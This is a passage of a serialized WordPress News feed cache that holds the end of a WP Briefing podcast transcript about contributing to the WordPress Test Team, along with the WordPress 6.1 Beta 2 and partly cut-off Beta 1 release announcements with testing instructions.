time. I think this release cycle has been really good with that, where there&#8217;s been a call for testing for fluid typography. There&#8217;s also been one for using block template parts and classic themes. And there&#8217;s a ton of stuff that&#8217;s been happening where we can kind of make these both developer and more end user testing experiences easier and better.</p>\n\n\n\n<p>And Brian has done a great job continuing the tradition of, you know, helping test this latest release cycle. And he&#8217;s taken those posts and done an amazing job of helping, having specific testing as well. Tied to this, I think just this has always been a thing but better, easier testing environments for developers and for quickly setting up more WordPress sites to test things for end users.</p>\n\n\n\n<p><strong>[Brian Alexander 00:17:56]</strong></p>\n\n\n\n<p>Yeah. Another thing that we have been discussing in Slack in the Core and Core Test channels is the possibility of pre-populating the Trac tickets. With a template based on what it is that you&#8217;re reporting. So similar to copying a template for a test report out of the handbook. Instead, you would hit a button to say the type of bug you are submitting, and then it would pre-populate that, and then you could fill in the gaps for that. This already happens over in Gutenberg. There, there are templates, and I find that that is very helpful. And so being able to do that in Trac would be useful.&nbsp;</p>\n\n\n\n<p>And then for reporting problems on the user side, I thought that it would be interesting to have like you have for any other modern app, a button that says Report Bug in WordPress that could capture some intelligence data for your installation, the page that you&#8217;re on and have a simple text box where you could provide a little description and then submit that.</p>\n\n\n\n<p><strong>[Brian Alexander 00:19:08]&nbsp;</strong></p>\n\n\n\n<p>Now, these wouldn&#8217;t be the types of things that would just go straight into Trac, most likely. However, it would be an opportunity to allow end users to just send something in, and start having it looked at, rather than looking and saying, okay, I found a bug in WordPress. Now, what do I do?&nbsp; And then not reporting.&nbsp;</p>\n\n\n\n<p>So that would be the worst case is that the bug just doesn&#8217;t get reported. So that would be information that is already harvested if you go to your site health screen and your WordPress installation. A lot of that information that would be useful is there. In this type of bug report, we would want to anonymize and strip a lot of that information out.</p>\n\n\n\n<p>There&#8217;s a lot of private stuff you don&#8217;t wanna share, but there is that data there that&#8217;s available that could potentially help in doing a bug report.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:19:57]</strong></p>\n\n\n\n<p>Brilliant. All right. Question for everyone in the room: what opportunities are there currently to help with testing? Anne, I know, and you already mentioned a few, we can just bombard everybody with links to the tests if we want. But yeah, what opportunities are currently out there?</p>\n\n\n\n<p><strong>[Anne McCarthy 00:20:13]</strong></p>\n\n\n\n<p>Yeah, I&#8217;ll mention the Full Site Editing outreach program. I&#8217;m very biased, but we&#8217;re always looking for new folks. We just crossed, I think, 600 people, which was unbelievable. So even if you&#8217;re not necessarily always able to help join the calls for testing, you can always pop into the FSE outreach experiment channel, which we&#8217;ll also add a link to.</p>\n\n\n\n<p>And that&#8217;s just a great way when you have time to join because I flag stuff all the time, whether it&#8217;s about the outreach program or just in general across the project. Brian does really good weekly round-up testing posts as well. So make.wordpress.org/test is also a great place to get started.</p>\n\n\n\n<p>And then right now, I think when this comes out, will be a great time to be helping test WordPress 6.1. So check out that post. I kind of wanna just shove everyone in that direction currently cause I think that&#8217;s the most high-impact thing to get involved with and one of the great ways to give back to the next version of WordPress to make it really delightful and easy to use.</p>\n\n\n\n<p>Yeah, I&#8217;m just gonna leave it there, even though there are so many ways you can help.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:21:11]</strong></p>\n\n\n\n<p>WordPress 6.1 coming out on November 1st if you haven&#8217;t yet heard about it. Brian, what else have you got out there?</p>\n\n\n\n<p><strong>[Brian Alexander 00:21:16]</strong>&nbsp;</p>\n\n\n\n<p>In terms of the online stuff, Anne covered that pretty well. I would say if you have a local WordCamp, sign up for their contributor day or if there are any local WordPress meetups. When Covid ended up hitting and lockdowns were rolled out, a lot of this stuff started to really slow down. So I think now is a good time to maybe introduce the idea for, hey, let&#8217;s have a local meetup, and for a couple of hours, we&#8217;ll just do some testing, and look at some stuff in WordPress.&nbsp;</p>\n\n\n\n<p>So it might be a good way of getting people re-engaged. It&#8217;s a little bit lighter weight if you&#8217;re doing testing versus trying to actually provide a patch to fix an issue. So, might be a good way of bringing in some new faces and re-engaging people who we lost over the lockdown.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:22:09]</strong>&nbsp;</p>\n\n\n\n<p>Yeah, and if you all have never done a testing party for WordPress before, and it sounds like it&#8217;s maybe a really boring thing, it&#8217;s actually not, she said with strong authority and opinions. But also, I have never had a more successful learning experience with the WordPress CMS than when I was trying to figure it out with other people.</p>\n\n\n\n<p>They see things that you don&#8217;t see, they know things you don&#8217;t know, and it really covers a lot of the bases for unknown unknowns when you&#8217;re trying to learn something. And then also you have all these people that like, we’re really in it with you, and everyone&#8217;s really pulling for each other, and it&#8217;s actually a bit more fun than it sounds like when you&#8217;re just like, a testing party. It turns into just like jointly solving a puzzle together, which I think sounds like a lot of fun.</p>\n\n\n\n<p>It&#8217;s like a party, but for technology, I would feel this way. I am a mad extrovert, and we all know it, but. Now you two know it as well.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:23:08]&nbsp;</strong></p>\n\n\n\n<p>I have a final, just like a fun question for you both, and if you have an answer, great. And if you don&#8217;t have an answer, I would be surprised.</p>\n\n\n\n<p>So here we go. Last question of the day. If five more volunteers suddenly appeared to help on the Test Team, what would they do? Just, I waved a magic wand. I guess that&#8217;s what made it fun. I don&#8217;t know why. I was like, fun question and then I&#8217;m, like, assigned tasks that, Yeah, I waved a magic wand. That&#8217;s what made it fun.</p>\n\n\n\n<p><strong>[Brian Alexander 00:23:38]&nbsp;</strong></p>\n\n\n\n<p>Yeah, I would say I would probably point them to FSE outreach program posts because…</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:23:45]</strong>&nbsp;</p>\n\n\n\n<p>Woot woot.&nbsp;</p>\n\n\n\n<p><strong>[Brian Alexander 00:23:47]</strong></p>\n\n\n\n<p>…the outreach program does a great job of outlining steps. You&#8217;re isolating testing in one particular area. It&#8217;s got a lot of tests. There&#8217;s examples of the types of feedback that you&#8217;re looking for, et cetera.</p>\n\n\n\n<p>That&#8217;s a really good introduction to it, and most FSE testing does not require a local dev environment. Which is probably the biggest hurdle for a new tester coming in. If you do have developers with more experience, then they could start–and they wanted to look into Trac tickets or GitHub issues– then it does take a little bit of setup and you may spend the next few hours configuring your development environment.</p>\n\n\n\n<p>So instead, I would recommend that you start with something like FSE outreach program posts.</p>\n\n\n\n<p><strong>[Anne McCarthy 00:24:37]</strong></p>\n\n\n\n<p>I did not pay Brian to say that.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:24:42]&nbsp;</strong></p>\n\n\n\n<p>We&#8217;re just all partial to it here. That&#8217;s all.</p>\n\n\n\n<p><strong>[Anne McCarthy 00:24:45]&nbsp;</strong></p>\n\n\n\n<p>No, we really are. Yeah, no, this is, I love this question, and I actually find it really fun cause I think about it a lot. And we&#8217;ve talked about some of this stuff too, and it&#8217;s something that when I think about five more people suddenly appearing, makes me giddy.</p>\n\n\n\n<p>Because we have folks, who have helped with like, I think I&#8217;ve mentioned like translations and group testing and even responding to questions that come from the channel and like, I just wish if we had five folks full time dedicated to that, I could see way more hallway hangouts where we casually talk about stuff and actually go on a call and talk live.</p>\n\n\n\n<p>I could see folks, someone dedicated to helping translations and translating even more places. We have an Italian contributor who does it regularly, and a couple of Japanese contributors every once in awhile we get Spanish translation. But I&#8217;d love to see more translations to bring more people in, more facilitating group testing, more types of testing, helping me be more creative because sometimes I get a creative wall.</p>\n\n\n\n<p>But more than anything, if I really think long term about the project and thinking about this outreach program model, which I don&#8217;t think I fully appreciated how new it was, Josepha, when you introduced the idea, I think it would be so neat to bring in more folks to actually create new outreach programs.</p>\n\n\n\n<p><strong>[Anne McCarthy 00:25:52]&nbsp;</strong></p>\n\n\n\n<p>So maybe there&#8217;s an outreach program for theme authors or block theme authors, or maybe there&#8217;s an outreach program around collaborative editing. Like what does this look like, and how can we expand this to bring more people in? And I think a lot of that will prove the resiliency and lessons we&#8217;ve learned from Covid in the WordPress community.&nbsp;</p>\n\n\n\n<p>We can&#8217;t necessarily always rely on the meetup groups, so how can we meet people where they are? And I think there&#8217;s something really interesting and almost serendipitous that the outreach program started literally, I think it was like May 2020, like a couple of months into the pandemic.</p>\n\n\n\n<p>And I, like, I want to see it in a position of strength where we both have the in-person community alongside this outreach program model that can intertwine work. And I&#8217;d love to see the model expand to different types. And right now, maybe part of that is we use the outreach program model, the full site editing outreach program group itself, to experiment more and to keep that level of experimentation.</p>\n\n\n\n<p>That&#8217;s something I feel really strongly about is continuing to find what works and what doesn&#8217;t. And so if we had five more people, I could just, I&#8217;d probably go wild and have all sorts of cool, cool things and spinoffs, but I&#8217;m more introverted than Josepha, so there&#8217;s limitations to this.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:26:56]</strong>&nbsp;</p>\n\n\n\n<p>Well, you heard it here first. If you&#8217;re one of my 6,000 listeners. I only need five of one of you. Five of the ones of you to come and make Anne&#8217;s whole life an exciting joy for the next 12 months. So, I only need five of you and I know that you&#8217;re out there. There are 2000 or something, 6,000. I have no idea.</p>\n\n\n\n<p>I&#8217;ve got more than 1000 of you listening, and I know that you wanna come and help Anne cuz she&#8217;s a delight. I know you wanna come help Brian cuz he&#8217;s a delight. Both of you. This was such a fun conversation. Thank you for joining me today.</p>\n\n\n\n<p><strong>[Brian Alexander 00:27:29]</strong>&nbsp;</p>\n\n\n\n<p>Thank you, Josepha. Thank you, Anne.</p>\n\n\n\n<p><strong>[Anne McCarthy 00:27:31]</strong>&nbsp;</p>\n\n\n\n<p>Yeah. Thank you.</p>\n\n\n\n<p>[<strong>Josepha Haden Chomphosy </strong>00:27:33]</p>\n\n\n\n<p>And there it is a bit of a deep dive on the Test Team and how to get started on it. Like I mentioned, we&#8217;ll have a ton of links in the show notes over on wordpress.org/news. And I wanna remind folks that if you have questions or thoughts that you&#8217;d like to hear from me about, you can always email us at WPbriefing@wordpress.org.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:27:58]&nbsp;</strong></p>\n\n\n\n<p>That brings us now to our small list of big things. First and foremost, we are counting down the days to the WordPress 6.1 release. We are within a month of the target release date. So if you have not tested the latest version with your plugins or themes, now is the time.&nbsp;</p>\n\n\n\n<p>Secondly, we are seeing translated tutorials being submitted on learn.wordpress.org. I&#8217;m delighted to see that happening, and I encourage any polyglots out there who feel called to consider translating one into your language and help other people feel empowered to use WordPress.&nbsp;</p>\n\n\n\n<p>And then the third thing is that the WordPress Speaker Workshop for Women Voices in India just concluded, so to celebrate, we&#8217;ve opened registrations for the WordPress Speaker Workshop for Women Voices in Latin America. Unlike the last one, this event takes place in person on October 29th. And so I&#8217;ll include a link to registrations for that in the show notes as well.&nbsp;</p>\n\n\n\n<p>And that, my friends, is your small list of big things. Thanks for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosey, and I&#8217;ll see you again in a couple of weeks.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13551\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:69:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"WordPress 6.1 Beta 2 Now Available\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"https://wordpress.org/news/2022/09/wordpress-6-1-beta-2-now-available/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Sep 2022 18:12:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"6.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13533\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:306:\"WordPress 6.1 Beta 2 is now available for download and testing.\n\nThis version of the WordPress software is under development. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test Beta 2 on a test server and site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Jonathan Pantani\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:5875:\"\n<p><em><strong>WordPress 6.1 Beta 2 is now available for download and testing.</strong></em></p>\n\n\n\n<p><strong>This version of the WordPress software is under development</strong>. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test Beta 2 on a test server and site.&nbsp;</p>\n\n\n\n<p>You can test WordPress 6.1 Beta 2 in three ways:</p>\n\n\n\n<p><strong>Option 1: </strong>Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (select the “Bleeding edge” channel and “Beta/RC Only” stream).</p>\n\n\n\n<p><strong>Option 2: </strong>Direct download the <a href=\"https://wordpress.org/wordpress-6.1-beta2.zip\">Beta 2 version (zip)</a>.</p>\n\n\n\n<p><strong>Option 3:</strong> Use the following WP-CLI command:</p>\n\n\n\n<p><code>wp core update --version=6.1-beta2</code></p>\n\n\n\n<p>The current target for the final release is November 1, 2022, which is about five weeks away.&nbsp;</p>\n\n\n\n<p>Additional information on the <a href=\"https://make.wordpress.org/core/6-1/\">6.1 release cycle is available</a>.</p>\n\n\n\n<p>Check the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> for <a href=\"https://make.wordpress.org/core/tag/dev-notes+6-1/\">6.1-related developer notes</a> in the coming weeks detailing all upcoming changes.</p>\n\n\n\n<h2><strong>Keep WordPress bug-free – help with testing</strong></h2>\n\n\n\n<p>Testing for issues is critical for stabilizing a release throughout its development. Testing is also a great way to contribute. This detailed guide is an excellent start if you have never tested a beta release before.</p>\n\n\n\n<p>Testing helps ensure that this and future releases of WordPress are as stable and issue-free as possible. Anyone can take part in testing – especially great WordPress community members like you.</p>\n\n\n\n<p>Want to know more about testing releases like this one? Read about the <a href=\"https://make.wordpress.org/test/\">testing initiatives</a> that happen in Make Core. You can also join a <a href=\"https://wordpress.slack.com/messages/core-test/\">core-test channel</a> on the <a href=\"https://wordpress.slack.com/\">Making WordPress Slack workspace</a>.</p>\n\n\n\n<p>If you have run into an issue, please report it to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. If you are comfortable&nbsp;writing a reproducible bug report, you can <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>. This is also where you can find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<p>To review features in the Gutenberg releases since WordPress 6.0 (the most recent major release of WordPress), access the <em>What’s New In Gutenberg</em> posts for <a href=\"https://make.wordpress.org/core/2022/09/16/whats-new-in-gutenberg-14-1-15-september/\">14.1</a>, <a href=\"https://make.wordpress.org/core/2022/09/01/whats-new-in-gutenberg-14-0-31-august/\">14.0</a>, <a href=\"https://make.wordpress.org/core/2022/08/17/whats-new-in-gutenberg-13-9-17-august/\">13.9</a>, <a href=\"https://make.wordpress.org/core/2022/08/04/whats-new-in-gutenberg-13-8-3-august/\">13.8</a>, <a href=\"https://make.wordpress.org/core/2022/07/20/whats-new-in-gutenberg-13-7-20-july/\">13.7</a>, <a href=\"https://make.wordpress.org/core/2022/07/07/whats-new-in-gutenberg-13-6-6-july/\">13.6</a>, <a href=\"https://make.wordpress.org/core/2022/06/22/whats-new-in-gutenberg-13-5-22-june/\">13.5</a>, <a href=\"https://make.wordpress.org/core/2022/06/10/whats-new-in-gutenberg-13-4-8-june/\">13.4</a>, <a href=\"https://make.wordpress.org/core/2022/05/26/whats-new-in-gutenberg-13-3-0-may-25/\">13.3</a>, <a href=\"https://make.wordpress.org/core/2022/05/12/whats-new-in-gutenberg-13-2-may-11/\">13.2</a>, and <a href=\"https://make.wordpress.org/core/2022/04/28/whats-new-in-gutenberg-13-1-27-april/\">13.1</a>.</p>\n\n\n\n<p>This release contains more than 350 enhancements and 350 bug fixes for the editor, including more than <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;milestone=6.1&amp;group=component&amp;max=500&amp;col=id&amp;col=summary&amp;col=owner&amp;col=type&amp;col=priority&amp;col=component&amp;col=version&amp;order=priority\">300 tickets for WordPress 6.1 core</a>. More fixes are on the way in the remainder of the 6.1 release cycle.</p>\n\n\n\n<h2><strong>Some highlights</strong></h2>\n\n\n\n<p>Want to know what’s new in version 6.1? <a href=\"https://wordpress.org/news/2022/09/wordpress-6-1-beta-1-now-available/\">Read the initial Beta 1 announcement</a> for some details, or check out the <a href=\"https://make.wordpress.org/core/2022/09/14/6-1-product-walk-through-recap/\">product walk-through recording</a>.</p>\n\n\n\n<h2><strong>What’s new in Beta 2</strong></h2>\n\n\n\n<p>Here are some updates since last week&#8217;s Beta 1 release:</p>\n\n\n\n<ul>\n<li><a href=\"https://github.com/WordPress/gutenberg/commits/wp/6.1\">24 issues addressed in GitHub</a></li>\n</ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2>A haiku for Beta 2</h2>\n\n\n\n<p>WordPress six-point-one,<br>Please help test Beta 2 now.<br>Best release ever.<br></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>Thank you to the following contributors for collaborating on this post: <a href=\"https://profiles.wordpress.org/dansoschin/\">@dansoschin</a>, <a href=\"https://profiles.wordpress.org/robinwpdeveloper/\">@robinwpdeveloper</a>, <a href=\"https://profiles.wordpress.org/webcommsat/\">@webcommsat</a>, <a href=\'https://profiles.wordpress.org/jeffpaul/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>jeffpaul</a>, and <a href=\'https://profiles.wordpress.org/cbringmann/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>cbringmann</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13533\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:69:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"WordPress 6.1 Beta 1 Now Available\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"https://wordpress.org/news/2022/09/wordpress-6-1-beta-1-now-available/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 21 Sep 2022 17:09:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"6.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13495\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:306:\"WordPress 6.1 Beta 1 is now available for download and testing.\n\nThis version of the WordPress software is under development. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test Beta 1 on a test server and site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Jonathan Pantani\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:8473:\"\n<p>WordPress 6.1 Beta 1 is now available for download and testing.</p>\n\n\n\n<p><strong>This version of the WordPress software is under development</strong>. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test Beta 1 on a test server and site.&nbsp;</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>You can test WordPress 6.1 Beta 1 in three ways:</p>\n\n\n\n<p><strong>Option 1: </strong>Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (select the “Bleeding edge” channel and “Beta/RC Only” stream).</p>\n\n\n\n<p><strong>Option 2: </strong>Direct download the <a href=\"https://wordpress.org/wordpress-6.1-beta1.zip\">Beta 1 version (zip)</a>.</p>\n\n\n\n<p><strong>Option 3:</strong> Use the following WP-CLI command:</p>\n\n\n\n<p><code>wp core update --version=6.1-beta1</code></p>\n\n\n\n<p>The current target for the final release is November 1, 2022, which is about six weeks away.&nbsp;</p>\n\n\n\n<p>Additional information on the <a href=\"https://make.wordpress.org/core/6-1/\">6.1 release cycle is available</a>.</p>\n\n\n\n<p>Check the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> for <a href=\"https://make.wordpress.org/core/tag/dev-notes+6-1/\">6.1-related developer notes</a> in the coming weeks detailing all upcoming changes.</p>\n\n\n\n<h2><strong>Keep WordPress bug-free – help with testing</strong></h2>\n\n\n\n<p>Testing for issues is critical for stabilizing a release throughout its development. Testing is also a great way to contribute. If you have never tested a beta release before, <a href=\"https://make.wordpress.org/test/2022/09/21/help-test-wordpress-6-1/\">this detailed guide</a> is a great start.</p>\n\n\n\n<p>Testing helps make sure that this and future releases of WordPress are as stable and issue-free as possible. Anyone can do it – especially great WordPress community members like you.</p>\n\n\n\n<p>Want to know more about testing releases like this one? Read about the <a href=\"https://make.wordpress.org/test/\">testing initiatives</a> that happen in Make Core. You can also join a <a href=\"https://wordpress.slack.com/messages/core-test/\">publicly-accessible channel</a> on the <a href=\"https://wordpress.slack.com/\">Making WordPress Slack workspace</a>.</p>\n\n\n\n<p>If you think you have run into an issue, please report it to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. If you are comfortable writing a reproducible bug report, you can <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>. This is also where you can find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<p>To review features in the Gutenberg releases since WordPress 6.0 (the most recent major release of WordPress), access the <em>What’s New In Gutenberg</em> posts for <a href=\"https://make.wordpress.org/core/2022/09/16/whats-new-in-gutenberg-14-1-15-september/\">14.1</a>, <a href=\"https://make.wordpress.org/core/2022/09/01/whats-new-in-gutenberg-14-0-31-august/\">14.0</a>, <a href=\"https://make.wordpress.org/core/2022/08/17/whats-new-in-gutenberg-13-9-17-august/\">13.9</a>, <a href=\"https://make.wordpress.org/core/2022/08/04/whats-new-in-gutenberg-13-8-3-august/\">13.8</a>, <a href=\"https://make.wordpress.org/core/2022/07/20/whats-new-in-gutenberg-13-7-20-july/\">13.7</a>, <a href=\"https://make.wordpress.org/core/2022/07/07/whats-new-in-gutenberg-13-6-6-july/\">13.6</a>, <a href=\"https://make.wordpress.org/core/2022/06/22/whats-new-in-gutenberg-13-5-22-june/\">13.5</a>, <a href=\"https://make.wordpress.org/core/2022/06/10/whats-new-in-gutenberg-13-4-8-june/\">13.4</a>, <a href=\"https://make.wordpress.org/core/2022/05/26/whats-new-in-gutenberg-13-3-0-may-25/\">13.3</a>, <a href=\"https://make.wordpress.org/core/2022/05/12/whats-new-in-gutenberg-13-2-may-11/\">13.2</a>, and <a href=\"https://make.wordpress.org/core/2022/04/28/whats-new-in-gutenberg-13-1-27-april/\">13.1</a>.</p>\n\n\n\n<p>This release contains more than 350 enhancements and 350 bug fixes for the editor, including more than <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;milestone=6.1&amp;group=component&amp;max=500&amp;col=id&amp;col=summary&amp;col=owner&amp;col=type&amp;col=priority&amp;col=component&amp;col=version&amp;order=priority\">250 tickets for the WordPress 6.1 core</a>.</p>\n\n\n\n<h2><strong>Some highlights</strong></h2>\n\n\n\n<p><em>Want to know what’s new in WordPress version 6.1? Read on for some highlights.</em></p>\n\n\n\n<h3>Features for end-users</h3>\n\n\n\n<ul>\n<li>Default theme powered by 10 unique style variations (<a rel=\"noreferrer noopener\" href=\"https://make.wordpress.org/design/2022/09/07/tt3-default-theme-announcing-style-variation-selections/\" target=\"_blank\">learn more</a>)</li>\n\n\n\n<li>More design tools in more blocks (<a rel=\"noreferrer noopener\" href=\"https://github.com/WordPress/gutenberg/issues/43241\" target=\"_blank\">learn more</a>)</li>\n\n\n\n<li>Expanded and refined&nbsp;<a rel=\"noreferrer noopener\" href=\"https://make.wordpress.org/core/2022/08/25/core-editor-improvement-refining-the-template-creation-experience/\" target=\"_blank\">template experience</a>&nbsp;and&nbsp;<a rel=\"noreferrer noopener\" href=\"https://make.wordpress.org/core/2022/07/21/core-editor-improvement-deeper-customization-with-more-template-options/\" target=\"_blank\">template options</a></li>\n\n\n\n<li>More intuitive document settings experience</li>\n\n\n\n<li>Header and footer patterns for all themes</li>\n\n\n\n<li>Improved quote and list blocks with inner block support</li>\n\n\n\n<li>More robust placeholders for various 